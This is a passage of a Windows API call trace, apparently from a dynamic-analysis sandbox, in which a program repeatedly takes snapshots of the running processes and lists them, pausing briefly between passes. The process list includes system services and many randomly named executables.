hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, 
dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0108.431] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0108.432] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0108.432] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0108.433] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0108.434] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0108.434] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0108.435] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="svchost.exe")) returned 1 [0108.436] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.436] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.437] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.438] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.438] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0108.439] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.440] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="svchost.exe")) returned 1 [0108.440] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0108.441] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.443] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0108.444] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0108.554] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0108.555] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0108.557] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="svchost.exe")) returned 1 [0108.558] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0108.559] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0108.560] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0108.561] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0108.562] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0108.564] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0108.565] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 
th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0108.566] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0108.567] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0108.568] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0108.569] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0108.570] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0108.571] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0108.572] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0108.574] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0108.575] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0108.576] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0108.578] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0108.579] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0108.580] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0108.581] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0108.582] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.583] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0108.584] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0108.593] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0108.594] CloseHandle (hObject=0xbc) returned 1 [0108.594] Sleep (dwMilliseconds=0x12c) [0108.900] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0108.906] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0108.907] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="System")) returned 1 [0108.908] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0108.909] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0108.909] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0108.910] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0108.911] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0108.912] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0108.913] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, 
szExeFile="lsass.exe")) returned 1 [0108.914] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0108.915] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.915] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.916] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.917] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.918] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.919] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="audiodg.exe")) returned 1 [0108.920] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.920] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.921] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0108.923] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.924] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0108.925] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0108.927] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="dwm.exe")) returned 1 [0108.928] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0108.930] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.931] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0108.933] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0108.934] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0108.935] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0108.937] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 
th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0108.938] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0108.939] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0108.940] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0108.941] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0108.942] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0108.943] Process32NextW (in: 